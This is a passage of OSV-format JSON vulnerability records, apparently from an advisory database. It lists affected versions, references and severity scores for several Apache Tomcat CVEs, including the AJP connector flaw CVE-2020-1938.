"7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-9xcj-c8cr-8c3c/GHSA-9xcj-c8cr-8c3c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.50" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-9xcj-c8cr-8c3c/GHSA-9xcj-c8cr-8c3c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.30" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-9xcj-c8cr-8c3c/GHSA-9xcj-c8cr-8c3c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17563" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4251-1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200107-0001" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202003-43" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00024.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb9a66f176df29b9a832caa95ebd9ffa3284e8f4922ec4fa3ad8eb2e@%3Cissues.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8b4c1db8300117b28a0f3f743c0b9e3f964687a690cdf9662a884bbd%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00013.html" } ], "database_specific": { "cwe_ids": [ "CWE-384" ], "github_reviewed": true, "github_reviewed_at": "2019-12-26T18:22:01Z", "nvd_published_at": "2019-12-23T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c9hw-wf7x-jp9j", "published": "2020-06-15T18:51:21Z", "modified": "2025-10-22T19:30:16.570842Z", "aliases": [ "BIT-tomcat-2020-1938", "CVE-2020-1938" ], "related": [ "CGA-w63f-vc82-fh9w" ], "summary": "Improper Privilege Management in Tomcat", "details": "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: returning arbitrary files from anywhere in the web application, processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.31" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-c9hw-wf7x-jp9j/GHSA-c9hw-wf7x-jp9j.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.51" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-c9hw-wf7x-jp9j/GHSA-c9hw-wf7x-jp9j.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.100" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96", "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-c9hw-wf7x-jp9j/GHSA-c9hw-wf7x-jp9j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1938" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7%40%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2%40%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a%40%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4673" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-1938" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200226-0002" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202003-43" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca@%3Cbugs.httpd.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca%40%3Cbugs.httpd.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e%40%3Cdev.tomee.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a@%3Cusers.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a%40%3Cusers.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html" }, { "type": "WEB", "url": "http://support.blackberry.com/kb/articleDetail?articleNumber=000062739" } ], "database_specific": { "cwe_ids": [ "CWE-269" ], "github_reviewed": true, "github_reviewed_at": "2020-06-15T16:10:05Z", "nvd_published_at": "2020-02-24T22:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cx6h-86xw-9x34", "published": "2023-07-06T21:14:59Z", "modified": "2024-04-24T19:31:03.102779Z", "aliases": [ "BIT-tomcat-2023-28709", "CVE-2023-28709" ], "summary": "Apache Tomcat - Fix for CVE-2023-24998 was incomplete", "details": "The fix for CVE-2023-24998 was incomplete. If non-default HTTP connector settings were used such that the maxParameterCount could be reached using query string parameters and a request was submitted that supplied exactly maxParameterCount parameters in the query string, the limit for uploaded request parts could be bypassed with the potential for a denial of service to occur.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.0-M5" } ] } ], "versions": [ "11.0.0-M3", "11.0.0-M4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-cx6h-86xw-9x34/GHSA-cx6h-86xw-9x34.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.5" }, { "fixed": "10.1.8" } ] } ], "versions": [ "10.1.5", "10.1.6", "10.1.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-cx6h-86xw-9x34/GHSA-cx6h-86xw-9x34.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.71" }, { "fixed": "9.0.74" } ] } ], "versions": [ "9.0.71", "9.0.72", "9.0.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-cx6h-86xw-9x34/GHSA-cx6h-86xw-9x34.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.85" }, { "fixed": "8.5.88" } ] } ], "versions": [ "8.5.85", "8.5.86", "8.5.87" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-cx6h-86xw-9x34/GHSA-cx6h-86xw-9x34.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28709" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/5badf94e79e5de206fc0ef3054fd536b1bb787cd" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ba848da71c523d94950d3c53c19ea155189df9dc" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d53d8e7f77042cc32a3b98f589496a1ef5088e38" }, { "type": "WEB", "url": 